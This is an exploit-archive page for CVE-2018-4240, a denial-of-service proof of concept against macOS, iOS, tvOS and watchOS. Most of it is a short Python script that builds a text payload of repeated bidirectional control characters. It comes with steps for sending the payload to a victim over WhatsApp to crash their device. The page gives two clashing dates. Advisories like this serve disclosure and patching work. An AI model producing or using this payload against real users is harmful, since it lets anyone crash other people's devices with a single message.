Apple macOS 10.13.4 Denial of Service (PoC)

2018.09.13
Credit: Sriram
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC) # Date: 2019-09-10 # Exploit Author: Sriram (@Sri_Hxor) # Vendor Homepage: https://support.apple.com/en-in/HT208848 # Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0 # CVE : CVE-2018-4240 (2018) # POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf # Crashing Phone via RLM character. # Steps to Reproduce, # Run the below python script as "python apple.py", it will create a file called "dos_apple.txt" # Copy the text from the generated apple.txt # Paste it in WhatsApp and send it, victim gotta click and it will start crashing end = "‮ereh-hcuot-t'nod" dos = "‎‏" payload = dos*1000 + end try: f=open("dos_apple.txt","w") print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos)) f.write(payload) f.close() print "[+] File created!" except: print "Can't create a file, check DIR permissions?"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top